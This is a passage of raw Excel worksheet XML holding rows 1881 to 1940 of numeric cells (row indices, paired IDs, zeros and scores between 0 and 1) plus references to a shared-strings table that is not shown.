        <v>7</v>
      </c>
      <c r="G1881" t="s">
        <v>3712</v>
      </c>
      <c r="H1881" t="s">
        <v>3713</v>
      </c>
    </row>
    <row r="1882" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1882" s="1">
        <v>1880</v>
      </c>
      <c r="B1882">
        <v>5563</v>
      </c>
      <c r="C1882">
        <v>5563</v>
      </c>
      <c r="D1882">
        <v>0</v>
      </c>
      <c r="E1882">
        <v>0.82270002365112305</v>
      </c>
      <c r="F1882" t="s">
        <v>7</v>
      </c>
      <c r="G1882" t="s">
        <v>3714</v>
      </c>
      <c r="H1882" t="s">
        <v>3715</v>
      </c>
    </row>
    <row r="1883" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1883" s="1">
        <v>1881</v>
      </c>
      <c r="B1883">
        <v>5661</v>
      </c>
      <c r="C1883">
        <v>5661</v>
      </c>
      <c r="D1883">
        <v>0</v>
      </c>
      <c r="E1883">
        <v>0.68379998207092285</v>
      </c>
      <c r="F1883" t="s">
        <v>7</v>
      </c>
      <c r="G1883" t="s">
        <v>3716</v>
      </c>
      <c r="H1883" t="s">
        <v>3717</v>
      </c>
    </row>
    <row r="1884" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1884" s="1">
        <v>1882</v>
      </c>
      <c r="B1884">
        <v>1247</v>
      </c>
      <c r="C1884">
        <v>1247</v>
      </c>
      <c r="D1884">
        <v>0</v>
      </c>
      <c r="E1884">
        <v>0.98659998178482056</v>
      </c>
      <c r="F1884" t="s">
        <v>7</v>
      </c>
      <c r="G1884" t="s">
        <v>3718</v>
      </c>
      <c r="H1884" t="s">
        <v>3719</v>
      </c>
    </row>
    <row r="1885" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1885" s="1">
        <v>1883</v>
      </c>
      <c r="B1885">
        <v>1246</v>
      </c>
      <c r="C1885">
        <v>1246</v>
      </c>
      <c r="D1885">
        <v>0</v>
      </c>
      <c r="E1885">
        <v>0.99629998207092285</v>
      </c>
      <c r="F1885" t="s">
        <v>7</v>
      </c>
      <c r="G1885" t="s">
        <v>3720</v>
      </c>
      <c r="H1885" t="s">
        <v>3721</v>
      </c>
    </row>
    <row r="1886" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1886" s="1">
        <v>1884</v>
      </c>
      <c r="B1886">
        <v>407</v>
      </c>
      <c r="C1886">
        <v>407</v>
      </c>
      <c r="D1886">
        <v>0</v>
      </c>
      <c r="E1886">
        <v>0.59049999713897705</v>
      </c>
      <c r="F1886" t="s">
        <v>7</v>
      </c>
      <c r="G1886" t="s">
        <v>3722</v>
      </c>
      <c r="H1886" t="s">
        <v>3723</v>
      </c>
    </row>
    <row r="1887" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1887" s="1">
        <v>1885</v>
      </c>
      <c r="B1887">
        <v>7344</v>
      </c>
      <c r="C1887">
        <v>7344</v>
      </c>
      <c r="D1887">
        <v>0</v>
      </c>
      <c r="E1887">
        <v>0.69650000333786011</v>
      </c>
      <c r="F1887" t="s">
        <v>7</v>
      </c>
      <c r="G1887" t="s">
        <v>3724</v>
      </c>
      <c r="H1887" t="s">
        <v>3725</v>
      </c>
    </row>
    <row r="1888" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1888" s="1">
        <v>1886</v>
      </c>
      <c r="B1888">
        <v>7345</v>
      </c>
      <c r="C1888">
        <v>7345</v>
      </c>
      <c r="D1888">
        <v>0</v>
      </c>
      <c r="E1888">
        <v>0.99750000238418579</v>
      </c>
      <c r="F1888" t="s">
        <v>7</v>
      </c>
      <c r="G1888" t="s">
        <v>3726</v>
      </c>
      <c r="H1888" t="s">
        <v>3727</v>
      </c>
    </row>
    <row r="1889" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1889" s="1">
        <v>1887</v>
      </c>
      <c r="B1889">
        <v>1242</v>
      </c>
      <c r="C1889">
        <v>1242</v>
      </c>
      <c r="D1889">
        <v>0</v>
      </c>
      <c r="E1889">
        <v>0.99129998683929443</v>
      </c>
      <c r="F1889" t="s">
        <v>7</v>
      </c>
      <c r="G1889" t="s">
        <v>3728</v>
      </c>
      <c r="H1889" t="s">
        <v>3729</v>
      </c>
    </row>
    <row r="1890" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1890" s="1">
        <v>1888</v>
      </c>
      <c r="B1890">
        <v>408</v>
      </c>
      <c r="C1890">
        <v>408</v>
      </c>
      <c r="D1890">
        <v>0</v>
      </c>
      <c r="E1890">
        <v>0.63410001993179321</v>
      </c>
      <c r="F1890" t="s">
        <v>7</v>
      </c>
      <c r="G1890" t="s">
        <v>3730</v>
      </c>
      <c r="H1890" t="s">
        <v>3731</v>
      </c>
    </row>
    <row r="1891" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1891" s="1">
        <v>1889</v>
      </c>
      <c r="B1891">
        <v>1240</v>
      </c>
      <c r="C1891">
        <v>1240</v>
      </c>
      <c r="D1891">
        <v>0</v>
      </c>
      <c r="E1891">
        <v>0.75550001859664917</v>
      </c>
      <c r="F1891" t="s">
        <v>7</v>
      </c>
      <c r="G1891" t="s">
        <v>3732</v>
      </c>
      <c r="H1891" t="s">
        <v>3733</v>
      </c>
    </row>
    <row r="1892" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1892" s="1">
        <v>1890</v>
      </c>
      <c r="B1892">
        <v>1239</v>
      </c>
      <c r="C1892">
        <v>1239</v>
      </c>
      <c r="D1892">
        <v>0</v>
      </c>
      <c r="E1892">
        <v>0.5163000226020813</v>
      </c>
      <c r="F1892" t="s">
        <v>7</v>
      </c>
      <c r="G1892" t="s">
        <v>3734</v>
      </c>
      <c r="H1892" t="s">
        <v>3735</v>
      </c>
    </row>
    <row r="1893" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1893" s="1">
        <v>1891</v>
      </c>
      <c r="B1893">
        <v>1238</v>
      </c>
      <c r="C1893">
        <v>1238</v>
      </c>
      <c r="D1893">
        <v>0</v>
      </c>
      <c r="E1893">
        <v>0.74479997158050537</v>
      </c>
      <c r="F1893" t="s">
        <v>7</v>
      </c>
      <c r="G1893" t="s">
        <v>3736</v>
      </c>
      <c r="H1893" t="s">
        <v>3737</v>
      </c>
    </row>
    <row r="1894" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1894" s="1">
        <v>1892</v>
      </c>
      <c r="B1894">
        <v>7347</v>
      </c>
      <c r="C1894">
        <v>7347</v>
      </c>
      <c r="D1894">
        <v>0</v>
      </c>
      <c r="E1894">
        <v>0.75459998846054077</v>
      </c>
      <c r="F1894" t="s">
        <v>7</v>
      </c>
      <c r="G1894" t="s">
        <v>3738</v>
      </c>
      <c r="H1894" t="s">
        <v>3739</v>
      </c>
    </row>
    <row r="1895" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1895" s="1">
        <v>1893</v>
      </c>
      <c r="B1895">
        <v>1236</v>
      </c>
      <c r="C1895">
        <v>1236</v>
      </c>
      <c r="D1895">
        <v>0</v>
      </c>
      <c r="E1895">
        <v>0.99330002069473267</v>
      </c>
      <c r="F1895" t="s">
        <v>7</v>
      </c>
      <c r="G1895" t="s">
        <v>3740</v>
      </c>
      <c r="H1895" t="s">
        <v>3741</v>
      </c>
    </row>
    <row r="1896" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1896" s="1">
        <v>1894</v>
      </c>
      <c r="B1896">
        <v>420</v>
      </c>
      <c r="C1896">
        <v>420</v>
      </c>
      <c r="D1896">
        <v>0</v>
      </c>
      <c r="E1896">
        <v>0.86729997396469116</v>
      </c>
      <c r="F1896" t="s">
        <v>7</v>
      </c>
      <c r="G1896" t="s">
        <v>3742</v>
      </c>
      <c r="H1896" t="s">
        <v>3743</v>
      </c>
    </row>
    <row r="1897" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1897" s="1">
        <v>1895</v>
      </c>
      <c r="B1897">
        <v>465</v>
      </c>
      <c r="C1897">
        <v>465</v>
      </c>
      <c r="D1897">
        <v>0</v>
      </c>
      <c r="E1897">
        <v>0.72689998149871826</v>
      </c>
      <c r="F1897" t="s">
        <v>7</v>
      </c>
      <c r="G1897" t="s">
        <v>3744</v>
      </c>
      <c r="H1897" t="s">
        <v>3745</v>
      </c>
    </row>
    <row r="1898" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1898" s="1">
        <v>1896</v>
      </c>
      <c r="B1898">
        <v>5217</v>
      </c>
      <c r="C1898">
        <v>5217</v>
      </c>
      <c r="D1898">
        <v>0</v>
      </c>
      <c r="E1898">
        <v>0.92559999227523804</v>
      </c>
      <c r="F1898" t="s">
        <v>7</v>
      </c>
      <c r="G1898" t="s">
        <v>3746</v>
      </c>
      <c r="H1898" t="s">
        <v>3747</v>
      </c>
    </row>
    <row r="1899" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1899" s="1">
        <v>1897</v>
      </c>
      <c r="B1899">
        <v>4961</v>
      </c>
      <c r="C1899">
        <v>4961</v>
      </c>
      <c r="D1899">
        <v>0</v>
      </c>
      <c r="E1899">
        <v>0.7368999719619751</v>
      </c>
      <c r="F1899" t="s">
        <v>7</v>
      </c>
      <c r="G1899" t="s">
        <v>3748</v>
      </c>
      <c r="H1899" t="s">
        <v>3749</v>
      </c>
    </row>
    <row r="1900" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1900" s="1">
        <v>1898</v>
      </c>
      <c r="B1900">
        <v>1106</v>
      </c>
      <c r="C1900">
        <v>1106</v>
      </c>
      <c r="D1900">
        <v>0</v>
      </c>
      <c r="E1900">
        <v>0.99000000953674316</v>
      </c>
      <c r="F1900" t="s">
        <v>7</v>
      </c>
      <c r="G1900" t="s">
        <v>3750</v>
      </c>
      <c r="H1900" t="s">
        <v>3751</v>
      </c>
    </row>
    <row r="1901" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1901" s="1">
        <v>1899</v>
      </c>
      <c r="B1901">
        <v>1107</v>
      </c>
      <c r="C1901">
        <v>1107</v>
      </c>
      <c r="D1901">
        <v>0</v>
      </c>
      <c r="E1901">
        <v>0.82340002059936523</v>
      </c>
      <c r="F1901" t="s">
        <v>7</v>
      </c>
      <c r="G1901" t="s">
        <v>3752</v>
      </c>
      <c r="H1901" t="s">
        <v>3753</v>
      </c>
    </row>
    <row r="1902" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1902" s="1">
        <v>1900</v>
      </c>
      <c r="B1902">
        <v>324</v>
      </c>
      <c r="C1902">
        <v>324</v>
      </c>
      <c r="D1902">
        <v>0</v>
      </c>
      <c r="E1902">
        <v>0.97329998016357422</v>
      </c>
      <c r="F1902" t="s">
        <v>7</v>
      </c>
      <c r="G1902" t="s">
        <v>3754</v>
      </c>
      <c r="H1902" t="s">
        <v>3755</v>
      </c>
    </row>
    <row r="1903" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1903" s="1">
        <v>1901</v>
      </c>
      <c r="B1903">
        <v>7421</v>
      </c>
      <c r="C1903">
        <v>7421</v>
      </c>
      <c r="D1903">
        <v>0</v>
      </c>
      <c r="E1903">
        <v>0.99409997463226318</v>
      </c>
      <c r="F1903" t="s">
        <v>7</v>
      </c>
      <c r="G1903" t="s">
        <v>3756</v>
      </c>
      <c r="H1903" t="s">
        <v>3757</v>
      </c>
    </row>
    <row r="1904" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1904" s="1">
        <v>1902</v>
      </c>
      <c r="B1904">
        <v>72</v>
      </c>
      <c r="C1904">
        <v>72</v>
      </c>
      <c r="D1904">
        <v>0</v>
      </c>
      <c r="E1904">
        <v>0.94110000133514404</v>
      </c>
      <c r="F1904" t="s">
        <v>7</v>
      </c>
      <c r="G1904" t="s">
        <v>3758</v>
      </c>
      <c r="H1904" t="s">
        <v>3759</v>
      </c>
    </row>
    <row r="1905" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1905" s="1">
        <v>1903</v>
      </c>
      <c r="B1905">
        <v>4969</v>
      </c>
      <c r="C1905">
        <v>4969</v>
      </c>
      <c r="D1905">
        <v>0</v>
      </c>
      <c r="E1905">
        <v>0.58980000019073486</v>
      </c>
      <c r="F1905" t="s">
        <v>7</v>
      </c>
      <c r="G1905" t="s">
        <v>3760</v>
      </c>
      <c r="H1905" t="s">
        <v>3761</v>
      </c>
    </row>
    <row r="1906" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1906" s="1">
        <v>1904</v>
      </c>
      <c r="B1906">
        <v>4981</v>
      </c>
      <c r="C1906">
        <v>4981</v>
      </c>
      <c r="D1906">
        <v>0</v>
      </c>
      <c r="E1906">
        <v>0.5285000205039978</v>
      </c>
      <c r="F1906" t="s">
        <v>7</v>
      </c>
      <c r="G1906" t="s">
        <v>3762</v>
      </c>
      <c r="H1906" t="s">
        <v>3763</v>
      </c>
    </row>
    <row r="1907" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1907" s="1">
        <v>1905</v>
      </c>
      <c r="B1907">
        <v>7703</v>
      </c>
      <c r="C1907">
        <v>7703</v>
      </c>
      <c r="D1907">
        <v>0</v>
      </c>
      <c r="E1907">
        <v>0.53990000486373901</v>
      </c>
      <c r="F1907" t="s">
        <v>7</v>
      </c>
      <c r="G1907" t="s">
        <v>3764</v>
      </c>
      <c r="H1907" t="s">
        <v>3765</v>
      </c>
    </row>
    <row r="1908" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1908" s="1">
        <v>1906</v>
      </c>
      <c r="B1908">
        <v>1111</v>
      </c>
      <c r="C1908">
        <v>1111</v>
      </c>
      <c r="D1908">
        <v>0</v>
      </c>
      <c r="E1908">
        <v>0.74739998579025269</v>
      </c>
      <c r="F1908" t="s">
        <v>7</v>
      </c>
      <c r="G1908" t="s">
        <v>3766</v>
      </c>
      <c r="H1908" t="s">
        <v>3767</v>
      </c>
    </row>
    <row r="1909" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1909" s="1">
        <v>1907</v>
      </c>
      <c r="B1909">
        <v>5697</v>
      </c>
      <c r="C1909">
        <v>5697</v>
      </c>
      <c r="D1909">
        <v>0</v>
      </c>
      <c r="E1909">
        <v>0.6470000147819519</v>
      </c>
      <c r="F1909" t="s">
        <v>7</v>
      </c>
      <c r="G1909" t="s">
        <v>3768</v>
      </c>
      <c r="H1909" t="s">
        <v>3769</v>
      </c>
    </row>
    <row r="1910" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1910" s="1">
        <v>1908</v>
      </c>
      <c r="B1910">
        <v>1113</v>
      </c>
      <c r="C1910">
        <v>1113</v>
      </c>
      <c r="D1910">
        <v>0</v>
      </c>
      <c r="E1910">
        <v>0.92510002851486206</v>
      </c>
      <c r="F1910" t="s">
        <v>7</v>
      </c>
      <c r="G1910" t="s">
        <v>3770</v>
      </c>
      <c r="H1910" t="s">
        <v>3771</v>
      </c>
    </row>
    <row r="1911" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1911" s="1">
        <v>1909</v>
      </c>
      <c r="B1911">
        <v>1080</v>
      </c>
      <c r="C1911">
        <v>1080</v>
      </c>
      <c r="D1911">
        <v>0</v>
      </c>
      <c r="E1911">
        <v>0.98849999904632568</v>
      </c>
      <c r="F1911" t="s">
        <v>7</v>
      </c>
      <c r="G1911" t="s">
        <v>3772</v>
      </c>
      <c r="H1911" t="s">
        <v>3773</v>
      </c>
    </row>
    <row r="1912" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1912" s="1">
        <v>1910</v>
      </c>
      <c r="B1912">
        <v>1105</v>
      </c>
      <c r="C1912">
        <v>1105</v>
      </c>
      <c r="D1912">
        <v>0</v>
      </c>
      <c r="E1912">
        <v>0.79350000619888306</v>
      </c>
      <c r="F1912" t="s">
        <v>7</v>
      </c>
      <c r="G1912" t="s">
        <v>3774</v>
      </c>
      <c r="H1912" t="s">
        <v>3775</v>
      </c>
    </row>
    <row r="1913" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1913" s="1">
        <v>1911</v>
      </c>
      <c r="B1913">
        <v>7405</v>
      </c>
      <c r="C1913">
        <v>7405</v>
      </c>
      <c r="D1913">
        <v>0</v>
      </c>
      <c r="E1913">
        <v>0.99839997291564941</v>
      </c>
      <c r="F1913" t="s">
        <v>7</v>
      </c>
      <c r="G1913" t="s">
        <v>3776</v>
      </c>
      <c r="H1913" t="s">
        <v>3777</v>
      </c>
    </row>
    <row r="1914" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1914" s="1">
        <v>1912</v>
      </c>
      <c r="B1914">
        <v>1078</v>
      </c>
      <c r="C1914">
        <v>1078</v>
      </c>
      <c r="D1914">
        <v>0</v>
      </c>
      <c r="E1914">
        <v>0.77539998292922974</v>
      </c>
      <c r="F1914" t="s">
        <v>7</v>
      </c>
      <c r="G1914" t="s">
        <v>3778</v>
      </c>
      <c r="H1914" t="s">
        <v>3779</v>
      </c>
    </row>
    <row r="1915" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1915" s="1">
        <v>1913</v>
      </c>
      <c r="B1915">
        <v>5541</v>
      </c>
      <c r="C1915">
        <v>5541</v>
      </c>
      <c r="D1915">
        <v>0</v>
      </c>
      <c r="E1915">
        <v>0.63419997692108154</v>
      </c>
      <c r="F1915" t="s">
        <v>7</v>
      </c>
      <c r="G1915" t="s">
        <v>3780</v>
      </c>
      <c r="H1915" t="s">
        <v>3781</v>
      </c>
    </row>
    <row r="1916" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1916" s="1">
        <v>1914</v>
      </c>
      <c r="B1916">
        <v>326</v>
      </c>
      <c r="C1916">
        <v>326</v>
      </c>
      <c r="D1916">
        <v>0</v>
      </c>
      <c r="E1916">
        <v>0.51139998435974121</v>
      </c>
      <c r="F1916" t="s">
        <v>7</v>
      </c>
      <c r="G1916" t="s">
        <v>3782</v>
      </c>
      <c r="H1916" t="s">
        <v>3783</v>
      </c>
    </row>
    <row r="1917" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1917" s="1">
        <v>1915</v>
      </c>
      <c r="B1917">
        <v>1115</v>
      </c>
      <c r="C1917">
        <v>1115</v>
      </c>
      <c r="D1917">
        <v>0</v>
      </c>
      <c r="E1917">
        <v>0.99589997529983521</v>
      </c>
      <c r="F1917" t="s">
        <v>7</v>
      </c>
      <c r="G1917" t="s">
        <v>3784</v>
      </c>
      <c r="H1917" t="s">
        <v>3785</v>
      </c>
    </row>
    <row r="1918" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1918" s="1">
        <v>1916</v>
      </c>
      <c r="B1918">
        <v>7404</v>
      </c>
      <c r="C1918">
        <v>7404</v>
      </c>
      <c r="D1918">
        <v>0</v>
      </c>
      <c r="E1918">
        <v>0.93010002374649048</v>
      </c>
      <c r="F1918" t="s">
        <v>7</v>
      </c>
      <c r="G1918" t="s">
        <v>3786</v>
      </c>
      <c r="H1918" t="s">
        <v>3787</v>
      </c>
    </row>
    <row r="1919" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1919" s="1">
        <v>1917</v>
      </c>
      <c r="B1919">
        <v>1077</v>
      </c>
      <c r="C1919">
        <v>1077</v>
      </c>
      <c r="D1919">
        <v>0</v>
      </c>
      <c r="E1919">
        <v>0.74000000953674316</v>
      </c>
      <c r="F1919" t="s">
        <v>7</v>
      </c>
      <c r="G1919" t="s">
        <v>3788</v>
      </c>
      <c r="H1919" t="s">
        <v>3789</v>
      </c>
    </row>
    <row r="1920" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1920" s="1">
        <v>1918</v>
      </c>
      <c r="B1920">
        <v>7403</v>
      </c>
      <c r="C1920">
        <v>7403</v>
      </c>
      <c r="D1920">
        <v>0</v>
      </c>
      <c r="E1920">
        <v>0.95260000228881836</v>
      </c>
      <c r="F1920" t="s">
        <v>7</v>
      </c>
      <c r="G1920" t="s">
        <v>3790</v>
      </c>
      <c r="H1920" t="s">
        <v>3791</v>
      </c>
    </row>
    <row r="1921" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1921" s="1">
        <v>1919</v>
      </c>
      <c r="B1921">
        <v>497</v>
      </c>
      <c r="C1921">
        <v>497</v>
      </c>
      <c r="D1921">
        <v>0</v>
      </c>
      <c r="E1921">
        <v>0.57819998264312744</v>
      </c>
      <c r="F1921" t="s">
        <v>7</v>
      </c>
      <c r="G1921" t="s">
        <v>3792</v>
      </c>
      <c r="H1921" t="s">
        <v>3793</v>
      </c>
    </row>
    <row r="1922" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1922" s="1">
        <v>1920</v>
      </c>
      <c r="B1922">
        <v>1076</v>
      </c>
      <c r="C1922">
        <v>1076</v>
      </c>
      <c r="D1922">
        <v>0</v>
      </c>
      <c r="E1922">
        <v>0.87970000505447388</v>
      </c>
      <c r="F1922" t="s">
        <v>7</v>
      </c>
      <c r="G1922" t="s">
        <v>3794</v>
      </c>
      <c r="H1922" t="s">
        <v>3795</v>
      </c>
    </row>
    <row r="1923" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1923" s="1">
        <v>1921</v>
      </c>
      <c r="B1923">
        <v>1075</v>
      </c>
      <c r="C1923">
        <v>1075</v>
      </c>
      <c r="D1923">
        <v>0</v>
      </c>
      <c r="E1923">
        <v>0.99800002574920654</v>
      </c>
      <c r="F1923" t="s">
        <v>7</v>
      </c>
      <c r="G1923" t="s">
        <v>3796</v>
      </c>
      <c r="H1923" t="s">
        <v>3797</v>
      </c>
    </row>
    <row r="1924" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1924" s="1">
        <v>1922</v>
      </c>
      <c r="B1924">
        <v>328</v>
      </c>
      <c r="C1924">
        <v>328</v>
      </c>
      <c r="D1924">
        <v>0</v>
      </c>
      <c r="E1924">
        <v>0.41589999198913569</v>
      </c>
      <c r="F1924" t="s">
        <v>7</v>
      </c>
      <c r="G1924" t="s">
        <v>3798</v>
      </c>
      <c r="H1924" t="s">
        <v>3799</v>
      </c>
    </row>
    <row r="1925" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1925" s="1">
        <v>1923</v>
      </c>
      <c r="B1925">
        <v>65</v>
      </c>
      <c r="C1925">
        <v>65</v>
      </c>
      <c r="D1925">
        <v>0</v>
      </c>
      <c r="E1925">
        <v>0.83689999580383301</v>
      </c>
      <c r="F1925" t="s">
        <v>7</v>
      </c>
      <c r="G1925" t="s">
        <v>3800</v>
      </c>
      <c r="H1925" t="s">
        <v>3801</v>
      </c>
    </row>
    <row r="1926" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1926" s="1">
        <v>1924</v>
      </c>
      <c r="B1926">
        <v>1079</v>
      </c>
      <c r="C1926">
        <v>1079</v>
      </c>
      <c r="D1926">
        <v>0</v>
      </c>
      <c r="E1926">
        <v>0.99750000238418579</v>
      </c>
      <c r="F1926" t="s">
        <v>7</v>
      </c>
      <c r="G1926" t="s">
        <v>3802</v>
      </c>
      <c r="H1926" t="s">
        <v>1379</v>
      </c>
    </row>
    <row r="1927" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1927" s="1">
        <v>1925</v>
      </c>
      <c r="B1927">
        <v>1074</v>
      </c>
      <c r="C1927">
        <v>1074</v>
      </c>
      <c r="D1927">
        <v>0</v>
      </c>
      <c r="E1927">
        <v>0.99279999732971191</v>
      </c>
      <c r="F1927" t="s">
        <v>7</v>
      </c>
      <c r="G1927" t="s">
        <v>3803</v>
      </c>
      <c r="H1927" t="s">
        <v>3804</v>
      </c>
    </row>
    <row r="1928" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1928" s="1">
        <v>1926</v>
      </c>
      <c r="B1928">
        <v>7407</v>
      </c>
      <c r="C1928">
        <v>7407</v>
      </c>
      <c r="D1928">
        <v>0</v>
      </c>
      <c r="E1928">
        <v>0.91750001907348633</v>
      </c>
      <c r="F1928" t="s">
        <v>7</v>
      </c>
      <c r="G1928" t="s">
        <v>3805</v>
      </c>
      <c r="H1928" t="s">
        <v>3806</v>
      </c>
    </row>
    <row r="1929" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1929" s="1">
        <v>1927</v>
      </c>
      <c r="B1929">
        <v>67</v>
      </c>
      <c r="C1929">
        <v>67</v>
      </c>
      <c r="D1929">
        <v>0</v>
      </c>
      <c r="E1929">
        <v>0.65890002250671387</v>
      </c>
      <c r="F1929" t="s">
        <v>7</v>
      </c>
      <c r="G1929" t="s">
        <v>3807</v>
      </c>
      <c r="H1929" t="s">
        <v>3808</v>
      </c>
    </row>
    <row r="1930" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1930" s="1">
        <v>1928</v>
      </c>
      <c r="B1930">
        <v>4974</v>
      </c>
      <c r="C1930">
        <v>4974</v>
      </c>
      <c r="D1930">
        <v>0</v>
      </c>
      <c r="E1930">
        <v>0.99690002202987671</v>
      </c>
      <c r="F1930" t="s">
        <v>7</v>
      </c>
      <c r="G1930" t="s">
        <v>3809</v>
      </c>
      <c r="H1930" t="s">
        <v>3810</v>
      </c>
    </row>
    <row r="1931" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1931" s="1">
        <v>1929</v>
      </c>
      <c r="B1931">
        <v>4975</v>
      </c>
      <c r="C1931">
        <v>4975</v>
      </c>
      <c r="D1931">
        <v>0</v>
      </c>
      <c r="E1931">
        <v>0.9976000189781189</v>
      </c>
      <c r="F1931" t="s">
        <v>7</v>
      </c>
      <c r="G1931" t="s">
        <v>3811</v>
      </c>
      <c r="H1931" t="s">
        <v>3812</v>
      </c>
    </row>
    <row r="1932" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1932" s="1">
        <v>1930</v>
      </c>
      <c r="B1932">
        <v>483</v>
      </c>
      <c r="C1932">
        <v>483</v>
      </c>
      <c r="D1932">
        <v>0</v>
      </c>
      <c r="E1932">
        <v>0.97960001230239868</v>
      </c>
      <c r="F1932" t="s">
        <v>7</v>
      </c>
      <c r="G1932" t="s">
        <v>3813</v>
      </c>
      <c r="H1932" t="s">
        <v>3814</v>
      </c>
    </row>
    <row r="1933" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1933" s="1">
        <v>1931</v>
      </c>
      <c r="B1933">
        <v>7709</v>
      </c>
      <c r="C1933">
        <v>7709</v>
      </c>
      <c r="D1933">
        <v>0</v>
      </c>
      <c r="E1933">
        <v>0.70349997282028198</v>
      </c>
      <c r="F1933" t="s">
        <v>7</v>
      </c>
      <c r="G1933" t="s">
        <v>3815</v>
      </c>
      <c r="H1933" t="s">
        <v>449</v>
      </c>
    </row>
    <row r="1934" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1934" s="1">
        <v>1932</v>
      </c>
      <c r="B1934">
        <v>4977</v>
      </c>
      <c r="C1934">
        <v>4977</v>
      </c>
      <c r="D1934">
        <v>0</v>
      </c>
      <c r="E1934">
        <v>0.85920000076293945</v>
      </c>
      <c r="F1934" t="s">
        <v>7</v>
      </c>
      <c r="G1934" t="s">
        <v>3816</v>
      </c>
      <c r="H1934" t="s">
        <v>3817</v>
      </c>
    </row>
    <row r="1935" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1935" s="1">
        <v>1933</v>
      </c>
      <c r="B1935">
        <v>7785</v>
      </c>
      <c r="C1935">
        <v>7785</v>
      </c>
      <c r="D1935">
        <v>0</v>
      </c>
      <c r="E1935">
        <v>0.73619997501373291</v>
      </c>
      <c r="F1935" t="s">
        <v>7</v>
      </c>
      <c r="G1935" t="s">
        <v>3818</v>
      </c>
      <c r="H1935" t="s">
        <v>3819</v>
      </c>
    </row>
    <row r="1936" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1936" s="1">
        <v>1934</v>
      </c>
      <c r="B1936">
        <v>7775</v>
      </c>
      <c r="C1936">
        <v>7775</v>
      </c>
      <c r="D1936">
        <v>0</v>
      </c>
      <c r="E1936">
        <v>0.95349997282028198</v>
      </c>
      <c r="F1936" t="s">
        <v>7</v>
      </c>
      <c r="G1936" t="s">
        <v>3820</v>
      </c>
      <c r="H1936" t="s">
        <v>3821</v>
      </c>
    </row>
    <row r="1937" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1937" s="1">
        <v>1935</v>
      </c>
      <c r="B1937">
        <v>7411</v>
      </c>
      <c r="C1937">
        <v>7411</v>
      </c>
      <c r="D1937">
        <v>0</v>
      </c>
      <c r="E1937">
        <v>0.76670002937316895</v>
      </c>
      <c r="F1937" t="s">
        <v>7</v>
      </c>
      <c r="G1937" t="s">
        <v>3822</v>
      </c>
      <c r="H1937" t="s">
        <v>3823</v>
      </c>
    </row>
    <row r="1938" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1938" s="1">
        <v>1936</v>
      </c>
      <c r="B1938">
        <v>5702</v>
      </c>
      <c r="C1938">
        <v>5702</v>
      </c>
      <c r="D1938">
        <v>0</v>
      </c>
      <c r="E1938">
        <v>0.97130000591278076</v>
      </c>
      <c r="F1938" t="s">
        <v>7</v>
      </c>
      <c r="G1938" t="s">
        <v>3824</v>
      </c>
      <c r="H1938" t="s">
        <v>3825</v>
      </c>
    </row>
    <row r="1939" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1939" s="1">
        <v>1937</v>
      </c>
      <c r="B1939">
        <v>480</v>
      </c>
      <c r="C1939">
        <v>480</v>
      </c>
      <c r="D1939">
        <v>0</v>
      </c>
      <c r="E1939">
        <v>0.99180001020431519</v>
      </c>
      <c r="F1939" t="s">
        <v>7</v>
      </c>
      <c r="G1939" t="s">
        <v>3826</v>
      </c>
      <c r="H1939" t="s">
        <v>3827</v>
      </c>
    </row>
    <row r="1940" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1940" s="1">
        <v>1938</v>
      </c>
      <c r="B1940">
        <v>479</v>
      </c>
      <c r="C1940">
